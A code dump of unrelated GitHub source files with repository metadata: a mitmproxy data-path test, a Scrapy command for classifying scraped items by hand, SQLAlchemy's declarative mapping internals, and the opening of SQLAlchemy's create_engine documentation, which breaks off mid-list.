def test_pkg_data():
assert data.pkg_data.path("tools/console")
with pytest.raises(ValueError):
data.pkg_data.path("nonexistent")
| {
"content_hash": "6cf258f78e1368c7e6950831c46b0650",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 46,
"avg_line_length": 24.375,
"alnum_prop": 0.7128205128205128,
"repo_name": "StevenVanAcker/mitmproxy",
"id": "f40fc86657127ed60f5084884502a6bd52c17eca",
"size": "195",
"binary": false,
"copies": "14",
"ref": "refs/heads/master",
"path": "test/mitmproxy/utils/test_data.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "20922"
},
{
"name": "HTML",
"bytes": "8617"
},
{
"name": "JavaScript",
"bytes": "276302"
},
{
"name": "PowerShell",
"bytes": "494"
},
{
"name": "Python",
"bytes": "1657512"
},
{
"name": "Shell",
"bytes": "4644"
}
],
"symlink_target": ""
} |
import os
import sys
import uuid
from scrapy.command import ScrapyCommand
from scrapy.utils.conf import arglist_to_dict
from scrapy.exceptions import UsageError
from collections import defaultdict
import json
from scrapy_sci.status import Status, Reader
from scrapy_sci.classifier import ClassifierFactory
class Command(ScrapyCommand):
requires_project = True
def syntax(self):
return "[options] <file_name>"
def short_desc(self):
return "Review file with classifiers"
def add_options(self, parser):
ScrapyCommand.add_options(self, parser)
parser.add_option("-c", "--classifiers", dest="classifiers", action="append", default=[],
help="list classifiers by which the file will be reviewed")
parser.add_option("-r", "--resume", dest="i_no", type="int", default=0,
help="resume review of a file at a given item")
def process_options(self, args, opts):
ScrapyCommand.process_options(self, args, opts)
def run(self, args, opts):
if len(args) < 1:
raise UsageError()
elif len(args) > 1:
raise UsageError("running 'scrapy review' with more than one argument is not supported")
file_name = args[0]
status = Status()
if len(opts.classifiers) == 0: opts.classifiers = status.classifiers.keys() #If all classifiers are to be used
#Setting up classifiers which are possible
valid_classifiers = defaultdict(dict)#Dictionary for currently feasible classifiers only
for classifier_name in status.classifiers.keys():
classifications = []
if status.classifiers[classifier_name]['info']['settings'] and opts.classifiers.count(classifier_name) == 1:
valid_classifiers[classifier_name]['classifications'] = \
sorted(status.classifiers[classifier_name]['classifications'])
#Counting files for valid classifiers
no_files = {}
classifiers = valid_classifiers.keys()
for classifier in valid_classifiers.keys():
reviewed = status.classifiers[classifier]['reviewed']
for classification in list(valid_classifiers[classifier]['classifications']):
no_files[classification] = len([x for x in reviewed if x.find(os.sep + classification) >= 0])
items = Reader.read_unreviewed(file_name)
#Confirmation mode
confirmation_mode = False
conf_input = 3
while conf_input > 2:
try:
conf_input = int(raw_input("1. Keep the same\n2. Turn on confirmation mode"))
except:
print "Wrong input"
if conf_input == 2: confirmation_mode = True
#Review of items
n = opts.i_no
while n < len(items):
print "ITEM {0}/{1}".format(n, len(items))
print no_files
item = items[n]
status.item.review(item)
if n >= opts.i_no:
to_write = {}
for classifier in valid_classifiers.keys():
#Loop to ensure a choice
is_a_choice = False
while is_a_choice == False:
prompt= "Pick classification\n"
choices = {}
i = 0
for classification in valid_classifiers[classifier]['classifications']:
i+=1
choices[i] = classification
prompt+= "{0}. {1}\t".format(i, classification)
if i % 3 == 0: prompt += "\n"
                        try:
                            choice = int(raw_input(prompt))
                        except:
                            print "Wrong input"
                            continue
                        if choices.has_key(choice): is_a_choice = True
to_write[classifier] = choices[choice]
confirmed = True
if confirmation_mode:
confirmed = False
print "Choices: {0}".format("\t".join(to_write[classifier] for classifier in to_write.keys()))
                    choice = 0
                    try:
                        choice = int(raw_input("1. Confirm \n 2. Reclassify"))
                    except:
                        print "Wrong input"
if choice == 1: confirmed = True
if confirmed:
for classifier in to_write.keys():
classifier_dir = os.path.join(status.data_dir, classifier)
no_files[to_write[classifier]]+=1
new_f_name = "{0}0{1}.json".format(to_write[classifier], no_files[to_write[classifier]])
with open(os.path.join(classifier_dir, new_f_name), "wb") as new_f:
new_f.write(json.dumps(item))
item['classifications'] = to_write
with open(os.path.join(status.to_upload_dir, "{0}.json".format(str(uuid.uuid4()))), "wb") as upload_f:
upload_f.write(json.dumps(item))
n+=1
            if n == len(items): sys.exit()
| {
"content_hash": "e0e04152f923616491fa2ff03499efcd",
"timestamp": "",
"source": "github",
"line_count": 113,
"max_line_length": 122,
"avg_line_length": 46.80530973451327,
"alnum_prop": 0.5354509359047079,
"repo_name": "dangra/scrapy-sci",
"id": "ce71d5152d88cef2c54194589d8f0f01bb381c72",
"size": "5289",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "scrapy_sci/commands/review.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
"""Internal implementation for declarative."""
from ...schema import Table, Column
from ...orm import mapper, class_mapper, synonym
from ...orm.interfaces import MapperProperty
from ...orm.properties import ColumnProperty, CompositeProperty
from ...orm.attributes import QueryableAttribute
from ...orm.base import _is_mapped_class
from ... import util, exc
from ...util import topological
from ...sql import expression
from ... import event
from . import clsregistry
import collections
import weakref
from sqlalchemy.orm import instrumentation
declared_attr = declarative_props = None
def _declared_mapping_info(cls):
# deferred mapping
if _DeferredMapperConfig.has_cls(cls):
return _DeferredMapperConfig.config_for_cls(cls)
# regular mapping
elif _is_mapped_class(cls):
return class_mapper(cls, configure=False)
else:
return None
def _resolve_for_abstract(cls):
if cls is object:
return None
if _get_immediate_cls_attr(cls, '__abstract__', strict=True):
for sup in cls.__bases__:
sup = _resolve_for_abstract(sup)
if sup is not None:
return sup
else:
return None
else:
return cls
def _get_immediate_cls_attr(cls, attrname, strict=False):
"""return an attribute of the class that is either present directly
on the class, e.g. not on a superclass, or is from a superclass but
this superclass is a mixin, that is, not a descendant of
the declarative base.
This is used to detect attributes that indicate something about
a mapped class independently from any mapped classes that it may
inherit from.
"""
if not issubclass(cls, object):
return None
for base in cls.__mro__:
_is_declarative_inherits = hasattr(base, '_decl_class_registry')
if attrname in base.__dict__ and (
base is cls or
((base in cls.__bases__ if strict else True)
and not _is_declarative_inherits)
):
return getattr(base, attrname)
else:
return None
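# Illustrative sketch of the distinction made above; ``Base``, ``Column``,
# ``Integer`` and the class names are assumptions for the example only:
#
#     class TablenameMixin(object):              # plain mixin, no registry
#         __tablename__ = "from_mixin"
#
#     class MyModel(TablenameMixin, Base):
#         id = Column(Integer, primary_key=True)
#
#     # _get_immediate_cls_attr(MyModel, '__tablename__') finds "from_mixin",
#     # because the mixin is not a descendant of the declarative base; the
#     # same attribute found only on an already-mapped superclass is ignored.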
def _as_declarative(cls, classname, dict_):
global declared_attr, declarative_props
if declared_attr is None:
from .api import declared_attr
declarative_props = (declared_attr, util.classproperty)
if _get_immediate_cls_attr(cls, '__abstract__', strict=True):
return
_MapperConfig.setup_mapping(cls, classname, dict_)
class _MapperConfig(object):
@classmethod
def setup_mapping(cls, cls_, classname, dict_):
defer_map = _get_immediate_cls_attr(
cls_, '_sa_decl_prepare_nocascade', strict=True) or \
hasattr(cls_, '_sa_decl_prepare')
if defer_map:
cfg_cls = _DeferredMapperConfig
else:
cfg_cls = _MapperConfig
cfg_cls(cls_, classname, dict_)
def __init__(self, cls_, classname, dict_):
self.cls = cls_
# dict_ will be a dictproxy, which we can't write to, and we need to!
self.dict_ = dict(dict_)
self.classname = classname
self.mapped_table = None
self.properties = util.OrderedDict()
self.declared_columns = set()
self.column_copies = {}
self._setup_declared_events()
# temporary registry. While early 1.0 versions
# set up the ClassManager here, by API contract
# we can't do that until there's a mapper.
self.cls._sa_declared_attr_reg = {}
self._scan_attributes()
clsregistry.add_class(self.classname, self.cls)
self._extract_mappable_attributes()
self._extract_declared_columns()
self._setup_table()
self._setup_inheritance()
self._early_mapping()
def _early_mapping(self):
self.map()
def _setup_declared_events(self):
if _get_immediate_cls_attr(self.cls, '__declare_last__'):
@event.listens_for(mapper, "after_configured")
def after_configured():
self.cls.__declare_last__()
if _get_immediate_cls_attr(self.cls, '__declare_first__'):
@event.listens_for(mapper, "before_configured")
def before_configured():
self.cls.__declare_first__()
def _scan_attributes(self):
cls = self.cls
dict_ = self.dict_
column_copies = self.column_copies
mapper_args_fn = None
table_args = inherited_table_args = None
tablename = None
for base in cls.__mro__:
class_mapped = base is not cls and \
_declared_mapping_info(base) is not None and \
not _get_immediate_cls_attr(
base, '_sa_decl_prepare_nocascade', strict=True)
if not class_mapped and base is not cls:
self._produce_column_copies(base)
for name, obj in vars(base).items():
if name == '__mapper_args__':
if not mapper_args_fn and (
not class_mapped or
isinstance(obj, declarative_props)
):
# don't even invoke __mapper_args__ until
# after we've determined everything about the
# mapped table.
# make a copy of it so a class-level dictionary
# is not overwritten when we update column-based
# arguments.
mapper_args_fn = lambda: dict(cls.__mapper_args__)
elif name == '__tablename__':
if not tablename and (
not class_mapped or
isinstance(obj, declarative_props)
):
tablename = cls.__tablename__
elif name == '__table_args__':
if not table_args and (
not class_mapped or
isinstance(obj, declarative_props)
):
table_args = cls.__table_args__
if not isinstance(
table_args, (tuple, dict, type(None))):
raise exc.ArgumentError(
"__table_args__ value must be a tuple, "
"dict, or None")
if base is not cls:
inherited_table_args = True
elif class_mapped:
if isinstance(obj, declarative_props):
util.warn("Regular (i.e. not __special__) "
"attribute '%s.%s' uses @declared_attr, "
"but owning class %s is mapped - "
"not applying to subclass %s."
% (base.__name__, name, base, cls))
continue
elif base is not cls:
# we're a mixin, abstract base, or something that is
# acting like that for now.
if isinstance(obj, Column):
# already copied columns to the mapped class.
continue
elif isinstance(obj, MapperProperty):
raise exc.InvalidRequestError(
"Mapper properties (i.e. deferred,"
"column_property(), relationship(), etc.) must "
"be declared as @declared_attr callables "
"on declarative mixin classes.")
elif isinstance(obj, declarative_props):
oldclassprop = isinstance(obj, util.classproperty)
if not oldclassprop and obj._cascading:
dict_[name] = column_copies[obj] = \
ret = obj.__get__(obj, cls)
setattr(cls, name, ret)
else:
if oldclassprop:
util.warn_deprecated(
"Use of sqlalchemy.util.classproperty on "
"declarative classes is deprecated.")
dict_[name] = column_copies[obj] = \
ret = getattr(cls, name)
if isinstance(ret, (Column, MapperProperty)) and \
ret.doc is None:
ret.doc = obj.__doc__
if inherited_table_args and not tablename:
table_args = None
self.table_args = table_args
self.tablename = tablename
self.mapper_args_fn = mapper_args_fn
def _produce_column_copies(self, base):
cls = self.cls
dict_ = self.dict_
column_copies = self.column_copies
# copy mixin columns to the mapped class
for name, obj in vars(base).items():
if isinstance(obj, Column):
if getattr(cls, name) is not obj:
# if column has been overridden
# (like by the InstrumentedAttribute of the
# superclass), skip
continue
elif obj.foreign_keys:
raise exc.InvalidRequestError(
"Columns with foreign keys to other columns "
"must be declared as @declared_attr callables "
"on declarative mixin classes. ")
elif name not in dict_ and not (
'__table__' in dict_ and
(obj.name or name) in dict_['__table__'].c
):
column_copies[obj] = copy_ = obj.copy()
copy_._creation_order = obj._creation_order
setattr(cls, name, copy_)
dict_[name] = copy_
def _extract_mappable_attributes(self):
cls = self.cls
dict_ = self.dict_
our_stuff = self.properties
for k in list(dict_):
if k in ('__table__', '__tablename__', '__mapper_args__'):
continue
value = dict_[k]
if isinstance(value, declarative_props):
value = getattr(cls, k)
elif isinstance(value, QueryableAttribute) and \
value.class_ is not cls and \
value.key != k:
# detect a QueryableAttribute that's already mapped being
# assigned elsewhere in userland, turn into a synonym()
value = synonym(value.key)
setattr(cls, k, value)
if (isinstance(value, tuple) and len(value) == 1 and
isinstance(value[0], (Column, MapperProperty))):
util.warn("Ignoring declarative-like tuple value of attribute "
"%s: possibly a copy-and-paste error with a comma "
"left at the end of the line?" % k)
continue
elif not isinstance(value, (Column, MapperProperty)):
# using @declared_attr for some object that
# isn't Column/MapperProperty; remove from the dict_
# and place the evaluated value onto the class.
if not k.startswith('__'):
dict_.pop(k)
setattr(cls, k, value)
continue
# we expect to see the name 'metadata' in some valid cases;
# however at this point we see it's assigned to something trying
# to be mapped, so raise for that.
elif k == 'metadata':
raise exc.InvalidRequestError(
"Attribute name 'metadata' is reserved "
"for the MetaData instance when using a "
"declarative base class."
)
prop = clsregistry._deferred_relationship(cls, value)
our_stuff[k] = prop
def _extract_declared_columns(self):
our_stuff = self.properties
# set up attributes in the order they were created
our_stuff.sort(key=lambda key: our_stuff[key]._creation_order)
# extract columns from the class dict
declared_columns = self.declared_columns
name_to_prop_key = collections.defaultdict(set)
for key, c in list(our_stuff.items()):
if isinstance(c, (ColumnProperty, CompositeProperty)):
for col in c.columns:
if isinstance(col, Column) and \
col.table is None:
_undefer_column_name(key, col)
if not isinstance(c, CompositeProperty):
name_to_prop_key[col.name].add(key)
declared_columns.add(col)
elif isinstance(c, Column):
_undefer_column_name(key, c)
name_to_prop_key[c.name].add(key)
declared_columns.add(c)
# if the column is the same name as the key,
# remove it from the explicit properties dict.
# the normal rules for assigning column-based properties
# will take over, including precedence of columns
# in multi-column ColumnProperties.
if key == c.key:
del our_stuff[key]
for name, keys in name_to_prop_key.items():
if len(keys) > 1:
util.warn(
"On class %r, Column object %r named "
"directly multiple times, "
"only one will be used: %s" %
(self.classname, name, (", ".join(sorted(keys))))
)
def _setup_table(self):
cls = self.cls
tablename = self.tablename
table_args = self.table_args
dict_ = self.dict_
declared_columns = self.declared_columns
declared_columns = self.declared_columns = sorted(
declared_columns, key=lambda c: c._creation_order)
table = None
if hasattr(cls, '__table_cls__'):
table_cls = util.unbound_method_to_callable(cls.__table_cls__)
else:
table_cls = Table
if '__table__' not in dict_:
if tablename is not None:
args, table_kw = (), {}
if table_args:
if isinstance(table_args, dict):
table_kw = table_args
elif isinstance(table_args, tuple):
if isinstance(table_args[-1], dict):
args, table_kw = table_args[0:-1], table_args[-1]
else:
args = table_args
autoload = dict_.get('__autoload__')
if autoload:
table_kw['autoload'] = True
cls.__table__ = table = table_cls(
tablename, cls.metadata,
*(tuple(declared_columns) + tuple(args)),
**table_kw)
else:
table = cls.__table__
if declared_columns:
for c in declared_columns:
if not table.c.contains_column(c):
raise exc.ArgumentError(
"Can't add additional column %r when "
"specifying __table__" % c.key
)
self.local_table = table
def _setup_inheritance(self):
table = self.local_table
cls = self.cls
table_args = self.table_args
declared_columns = self.declared_columns
for c in cls.__bases__:
c = _resolve_for_abstract(c)
if c is None:
continue
if _declared_mapping_info(c) is not None and \
not _get_immediate_cls_attr(
c, '_sa_decl_prepare_nocascade', strict=True):
self.inherits = c
break
else:
self.inherits = None
if table is None and self.inherits is None and \
not _get_immediate_cls_attr(cls, '__no_table__'):
raise exc.InvalidRequestError(
"Class %r does not have a __table__ or __tablename__ "
"specified and does not inherit from an existing "
"table-mapped class." % cls
)
elif self.inherits:
inherited_mapper = _declared_mapping_info(self.inherits)
inherited_table = inherited_mapper.local_table
inherited_mapped_table = inherited_mapper.mapped_table
if table is None:
# single table inheritance.
# ensure no table args
if table_args:
raise exc.ArgumentError(
"Can't place __table_args__ on an inherited class "
"with no table."
)
# add any columns declared here to the inherited table.
for c in declared_columns:
if c.primary_key:
raise exc.ArgumentError(
"Can't place primary key columns on an inherited "
"class with no table."
)
if c.name in inherited_table.c:
if inherited_table.c[c.name] is c:
continue
raise exc.ArgumentError(
"Column '%s' on class %s conflicts with "
"existing column '%s'" %
(c, cls, inherited_table.c[c.name])
)
inherited_table.append_column(c)
if inherited_mapped_table is not None and \
inherited_mapped_table is not inherited_table:
inherited_mapped_table._refresh_for_new_column(c)
def _prepare_mapper_arguments(self):
properties = self.properties
if self.mapper_args_fn:
mapper_args = self.mapper_args_fn()
else:
mapper_args = {}
# make sure that column copies are used rather
# than the original columns from any mixins
for k in ('version_id_col', 'polymorphic_on',):
if k in mapper_args:
v = mapper_args[k]
mapper_args[k] = self.column_copies.get(v, v)
assert 'inherits' not in mapper_args, \
"Can't specify 'inherits' explicitly with declarative mappings"
if self.inherits:
mapper_args['inherits'] = self.inherits
if self.inherits and not mapper_args.get('concrete', False):
# single or joined inheritance
# exclude any cols on the inherited table which are
# not mapped on the parent class, to avoid
# mapping columns specific to sibling/nephew classes
inherited_mapper = _declared_mapping_info(self.inherits)
inherited_table = inherited_mapper.local_table
if 'exclude_properties' not in mapper_args:
mapper_args['exclude_properties'] = exclude_properties = \
set([c.key for c in inherited_table.c
if c not in inherited_mapper._columntoproperty])
exclude_properties.difference_update(
[c.key for c in self.declared_columns])
# look through columns in the current mapper that
# are keyed to a propname different than the colname
# (if names were the same, we'd have popped it out above,
# in which case the mapper makes this combination).
# See if the superclass has a similar column property.
# If so, join them together.
for k, col in list(properties.items()):
if not isinstance(col, expression.ColumnElement):
continue
if k in inherited_mapper._props:
p = inherited_mapper._props[k]
if isinstance(p, ColumnProperty):
# note here we place the subclass column
# first. See [ticket:1892] for background.
properties[k] = [col] + p.columns
result_mapper_args = mapper_args.copy()
result_mapper_args['properties'] = properties
self.mapper_args = result_mapper_args
def map(self):
self._prepare_mapper_arguments()
if hasattr(self.cls, '__mapper_cls__'):
mapper_cls = util.unbound_method_to_callable(
self.cls.__mapper_cls__)
else:
mapper_cls = mapper
self.cls.__mapper__ = mp_ = mapper_cls(
self.cls,
self.local_table,
**self.mapper_args
)
del self.cls._sa_declared_attr_reg
return mp_
class _DeferredMapperConfig(_MapperConfig):
_configs = util.OrderedDict()
def _early_mapping(self):
pass
@property
def cls(self):
return self._cls()
@cls.setter
def cls(self, class_):
self._cls = weakref.ref(class_, self._remove_config_cls)
self._configs[self._cls] = self
@classmethod
def _remove_config_cls(cls, ref):
cls._configs.pop(ref, None)
@classmethod
def has_cls(cls, class_):
# 2.6 fails on weakref if class_ is an old style class
return isinstance(class_, type) and \
weakref.ref(class_) in cls._configs
@classmethod
def config_for_cls(cls, class_):
return cls._configs[weakref.ref(class_)]
@classmethod
def classes_for_base(cls, base_cls, sort=True):
classes_for_base = [m for m in cls._configs.values()
if issubclass(m.cls, base_cls)]
if not sort:
return classes_for_base
all_m_by_cls = dict(
(m.cls, m)
for m in classes_for_base
)
tuples = []
for m_cls in all_m_by_cls:
tuples.extend(
(all_m_by_cls[base_cls], all_m_by_cls[m_cls])
for base_cls in m_cls.__bases__
if base_cls in all_m_by_cls
)
return list(
topological.sort(
tuples,
classes_for_base
)
)
def map(self):
self._configs.pop(self._cls, None)
return super(_DeferredMapperConfig, self).map()
def _add_attribute(cls, key, value):
"""add an attribute to an existing declarative class.
This runs through the logic to determine MapperProperty,
adds it to the Mapper, adds a column to the mapped Table, etc.
"""
if '__mapper__' in cls.__dict__:
if isinstance(value, Column):
_undefer_column_name(key, value)
cls.__table__.append_column(value)
cls.__mapper__.add_property(key, value)
elif isinstance(value, ColumnProperty):
for col in value.columns:
if isinstance(col, Column) and col.table is None:
_undefer_column_name(key, col)
cls.__table__.append_column(col)
cls.__mapper__.add_property(key, value)
elif isinstance(value, MapperProperty):
cls.__mapper__.add_property(
key,
clsregistry._deferred_relationship(cls, value)
)
elif isinstance(value, QueryableAttribute) and value.key != key:
# detect a QueryableAttribute that's already mapped being
# assigned elsewhere in userland, turn into a synonym()
value = synonym(value.key)
cls.__mapper__.add_property(
key,
clsregistry._deferred_relationship(cls, value)
)
else:
type.__setattr__(cls, key, value)
else:
type.__setattr__(cls, key, value)
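# Illustrative sketch of the attribute-assignment path handled above; the
# ``User``/``Address`` classes and ``Base`` are assumptions for the example:
#
#     class User(Base):
#         __tablename__ = 'user'
#         id = Column(Integer, primary_key=True)
#
#     User.nickname = Column(String(50))          # appended to Table + Mapper
#     User.addresses = relationship("Address")    # added as a MapperProperty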
def _declarative_constructor(self, **kwargs):
"""A simple constructor that allows initialization from kwargs.
Sets attributes on the constructed instance using the names and
values in ``kwargs``.
Only keys that are present as
attributes of the instance's class are allowed. These could be,
for example, any mapped columns or relationships.
"""
cls_ = type(self)
for k in kwargs:
if not hasattr(cls_, k):
raise TypeError(
"%r is an invalid keyword argument for %s" %
(k, cls_.__name__))
setattr(self, k, kwargs[k])
_declarative_constructor.__name__ = '__init__'
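# Minimal usage sketch for the default constructor above; a mapped class
# ``User`` with ``name``/``email`` attributes is assumed:
#
#     u = User(name='ed', email='ed@example.com')   # attributes set via kwargs
#     User(unknown='x')                             # raises TypeError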
def _undefer_column_name(key, column):
if column.key is None:
column.key = key
if column.name is None:
column.name = key
| {
"content_hash": "f375da1d4ef5765bb2bc41c1287f6051",
"timestamp": "",
"source": "github",
"line_count": 651,
"max_line_length": 79,
"avg_line_length": 38.384024577572966,
"alnum_prop": 0.5178885865215304,
"repo_name": "jburger424/MediaQueueHCI",
"id": "59ebe3722a570b96504c6d55b580615164520389",
"size": "25231",
"binary": false,
"copies": "20",
"ref": "refs/heads/dev",
"path": "m-q-env/lib/python3.4/site-packages/sqlalchemy/ext/declarative/base.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "5939"
},
{
"name": "CSS",
"bytes": "28174"
},
{
"name": "HTML",
"bytes": "28708"
},
{
"name": "JavaScript",
"bytes": "125536"
},
{
"name": "Python",
"bytes": "7754137"
},
{
"name": "Shell",
"bytes": "3720"
}
],
"symlink_target": ""
} |
"""SQL connections, SQL execution and high-level DB-API interface.
The engine package defines the basic components used to interface
DB-API modules with higher-level statement construction,
connection-management, execution and result contexts. The primary
"entry point" class into this package is the Engine and it's public
constructor ``create_engine()``.
This package includes:
base.py
Defines interface classes and some implementation classes which
comprise the basic components used to interface between a DB-API,
constructed and plain-text statements, connections, transactions,
and results.
default.py
Contains default implementations of some of the components defined
in base.py. All current database dialects use the classes in
default.py as base classes for their own database-specific
implementations.
strategies.py
The mechanics of constructing ``Engine`` objects are represented
here. Defines the ``EngineStrategy`` class which represents how
to go from arguments specified to the ``create_engine()``
function, to a fully constructed ``Engine``, including
initialization of connection pooling, dialects, and specific
subclasses of ``Engine``.
threadlocal.py
The ``TLEngine`` class is defined here, which is a subclass of
the generic ``Engine`` and tracks ``Connection`` and
``Transaction`` objects against the identity of the current
thread. This allows certain programming patterns based around
the concept of a "thread-local connection" to be possible.
The ``TLEngine`` is created by using the "threadlocal" engine
strategy in conjunction with the ``create_engine()`` function.
url.py
Defines the ``URL`` class which represents the individual
components of a string URL passed to ``create_engine()``. Also
defines a basic module-loading strategy for the dialect specifier
within a URL.
"""
from .interfaces import (
Connectable,
Dialect,
ExecutionContext,
# backwards compat
Compiled,
TypeCompiler
)
from .base import (
Connection,
Engine,
NestedTransaction,
RootTransaction,
Transaction,
TwoPhaseTransaction,
)
from .result import (
BufferedColumnResultProxy,
BufferedColumnRow,
BufferedRowResultProxy,
FullyBufferedResultProxy,
ResultProxy,
RowProxy,
)
from .util import (
connection_memoize
)
from . import util, strategies
# backwards compat
from ..sql import ddl
default_strategy = 'plain'
def create_engine(*args, **kwargs):
"""Create a new :class:`.Engine` instance.
The standard calling form is to send the URL as the
first positional argument, usually a string
that indicates database dialect and connection arguments::
engine = create_engine("postgresql://scott:tiger@localhost/test")
Additional keyword arguments may then follow it which
establish various options on the resulting :class:`.Engine`
and its underlying :class:`.Dialect` and :class:`.Pool`
constructs::
engine = create_engine("mysql://scott:tiger@hostname/dbname",
encoding='latin1', echo=True)
The string form of the URL is
``dialect[+driver]://user:password@host/dbname[?key=value..]``, where
``dialect`` is a database name such as ``mysql``, ``oracle``,
``postgresql``, etc., and ``driver`` the name of a DBAPI, such as
``psycopg2``, ``pyodbc``, ``cx_oracle``, etc. Alternatively,
the URL can be an instance of :class:`~sqlalchemy.engine.url.URL`.
``**kwargs`` takes a wide variety of options which are routed
towards their appropriate components. Arguments may be specific to
the :class:`.Engine`, the underlying :class:`.Dialect`, as well as the
:class:`.Pool`. Specific dialects also accept keyword arguments that
are unique to that dialect. Here, we describe the parameters
that are common to most :func:`.create_engine()` usage.
Once established, the newly resulting :class:`.Engine` will
request a connection from the underlying :class:`.Pool` once
:meth:`.Engine.connect` is called, or a method which depends on it
such as :meth:`.Engine.execute` is invoked. The :class:`.Pool` in turn
will establish the first actual DBAPI connection when this request
is received. The :func:`.create_engine` call itself does **not**
establish any actual DBAPI connections directly.
.. seealso::
:doc:`/core/engines`
:doc:`/dialects/index`
:ref:`connections_toplevel`
:param case_sensitive=True: if False, result column names
will match in a case-insensitive fashion, that is,
``row['SomeColumn']``.
.. versionchanged:: 0.8
By default, result row names match case-sensitively.
In version 0.7 and prior, all matches were case-insensitive.
:param connect_args: a dictionary of options which will be
passed directly to the DBAPI's ``connect()`` method as
additional keyword arguments. See the example
at :ref:`custom_dbapi_args`.
:param convert_unicode=False: if set to True, sets
the default behavior of ``convert_unicode`` on the
:class:`.String` type to ``True``, regardless
of a setting of ``False`` on an individual
:class:`.String` type, thus causing all :class:`.String`
-based columns
to accommodate Python ``unicode`` objects. This flag
is useful as an engine-wide setting when using a
DBAPI that does not natively support Python
``unicode`` objects and raises an error when
one is received (such as pyodbc with FreeTDS).
See :class:`.String` for further details on
what this flag indicates.
:param creator: a callable which returns a DBAPI connection.
This creation function will be passed to the underlying
connection pool and will be used to create all new database
connections. Usage of this function causes connection
parameters specified in the URL argument to be bypassed.
:param echo=False: if True, the Engine will log all statements
as well as a repr() of their parameter lists to the engines
logger, which defaults to sys.stdout. The ``echo`` attribute of
``Engine`` can be modified at any time to turn logging on and
off. If set to the string ``"debug"``, result rows will be
printed to the standard output as well. This flag ultimately
controls a Python logger; see :ref:`dbengine_logging` for
information on how to configure logging directly.
:param echo_pool=False: if True, the connection pool will log
all checkouts/checkins to the logging stream, which defaults to
sys.stdout. This flag ultimately controls a Python logger; see
:ref:`dbengine_logging` for information on how to configure logging
directly.
:param encoding: Defaults to ``utf-8``. This is the string
encoding used by SQLAlchemy for string encode/decode
operations which occur within SQLAlchemy, **outside of
the DBAPI.** Most modern DBAPIs feature some degree of
direct support for Python ``unicode`` objects,
what you see in Python 2 as a string of the form
``u'some string'``. For those scenarios where the
DBAPI is detected as not supporting a Python ``unicode``
object, this encoding is used to determine the
source/destination encoding. It is **not used**
for those cases where the DBAPI handles unicode
directly.
To properly configure a system to accommodate Python
``unicode`` objects, the DBAPI should be
configured to handle unicode to the greatest
degree as is appropriate - see
the notes on unicode pertaining to the specific
target database in use at :ref:`dialect_toplevel`.
Areas where string encoding may need to be accommodated
outside of the DBAPI include zero or more of:
* the values passed to bound parameters, corresponding to
the :class:`.Unicode` type or the :class:`.String` type
when ``convert_unicode`` is ``True``;
* the values returned in result set columns corresponding
to the :class:`.Unicode` type or the :class:`.String`
type when ``convert_unicode`` is ``True``;
* the string SQL statement passed to the DBAPI's
``cursor.execute()`` method;
* the string names of the keys in the bound parameter
dictionary passed to the DBAPI's ``cursor.execute()``
as well as ``cursor.setinputsizes()`` methods;
* the string column names retrieved from the DBAPI's
``cursor.description`` attribute.
When using Python 3, the DBAPI is required to support
*all* of the above values as Python ``unicode`` objects,
which in Python 3 are just known as ``str``. In Python 2,
the DBAPI does not specify unicode behavior at all,
so SQLAlchemy must make decisions for each of the above
values on a per-DBAPI basis - implementations are
completely inconsistent in their behavior.
:param execution_options: Dictionary execution options which will
be applied to all connections. See
:meth:`~sqlalchemy.engine.Connection.execution_options`
:param implicit_returning=True: When ``True``, a RETURNING-
compatible construct, if available, will be used to
fetch newly generated primary key values when a single row
INSERT statement is emitted with no existing returning()
clause. This applies to those backends which support RETURNING
or a compatible construct, including Postgresql, Firebird, Oracle,
Microsoft SQL Server. Set this to ``False`` to disable
the automatic usage of RETURNING.
:param label_length=None: optional integer value which limits
the size of dynamically generated column labels to that many
characters. If less than 6, labels are generated as
"_(counter)". If ``None``, the value of
``dialect.max_identifier_length`` is used instead.
:param listeners: A list of one or more
:class:`~sqlalchemy.interfaces.PoolListener` objects which will
receive connection pool events.
:param logging_name: String identifier which will be used within
the "name" field of logging records generated within the
"sqlalchemy.engine" logger. Defaults to a hexstring of the
object's id.
:param max_overflow=10: the number of connections to allow in
connection pool "overflow", that is connections that can be
opened above and beyond the pool_size setting, which defaults
      to five. This is only used with :class:`~sqlalchemy.pool.QueuePool`.
:param module=None: reference to a Python module object (the module
itself, not its string name). Specifies an alternate DBAPI module to
be used by the engine's dialect. Each sub-dialect references a
specific DBAPI which will be imported before first connect. This
parameter causes the import to be bypassed, and the given module to
be used instead. Can be used for testing of DBAPIs as well as to
inject "mock" DBAPI implementations into the :class:`.Engine`.
:param pool=None: an already-constructed instance of
:class:`~sqlalchemy.pool.Pool`, such as a
:class:`~sqlalchemy.pool.QueuePool` instance. If non-None, this
pool will be used directly as the underlying connection pool
for the engine, bypassing whatever connection parameters are
present in the URL argument. For information on constructing
connection pools manually, see :ref:`pooling_toplevel`.
:param poolclass=None: a :class:`~sqlalchemy.pool.Pool`
subclass, which will be used to create a connection pool
instance using the connection parameters given in the URL. Note
this differs from ``pool`` in that you don't actually
instantiate the pool in this case, you just indicate what type
of pool to be used.
:param pool_logging_name: String identifier which will be used within
the "name" field of logging records generated within the
"sqlalchemy.pool" logger. Defaults to a hexstring of the object's
id.
:param pool_size=5: the number of connections to keep open
inside the connection pool. This used with
:class:`~sqlalchemy.pool.QueuePool` as
well as :class:`~sqlalchemy.pool.SingletonThreadPool`. With
:class:`~sqlalchemy.pool.QueuePool`, a ``pool_size`` setting
of 0 indicates no limit; to disable pooling, set ``poolclass`` to
:class:`~sqlalchemy.pool.NullPool` instead.
:param pool_recycle=-1: this setting causes the pool to recycle
connections after the given number of seconds has passed. It
defaults to -1, or no timeout. For example, setting to 3600
means connections will be recycled after one hour. Note that
MySQL in particular will disconnect automatically if no
activity is detected on a connection for eight hours (although
this is configurable with the MySQLDB connection itself and the
server configuration as well).
:param pool_reset_on_return='rollback': set the "reset on return"
behavior of the pool, which is whether ``rollback()``,
``commit()``, or nothing is called upon connections
being returned to the pool. See the docstring for
``reset_on_return`` at :class:`.Pool`.
.. versionadded:: 0.7.6
:param pool_timeout=30: number of seconds to wait before giving
up on getting a connection from the pool. This is only used
with :class:`~sqlalchemy.pool.QueuePool`.
:param strategy='plain': selects alternate engine implementations.
Currently available are:
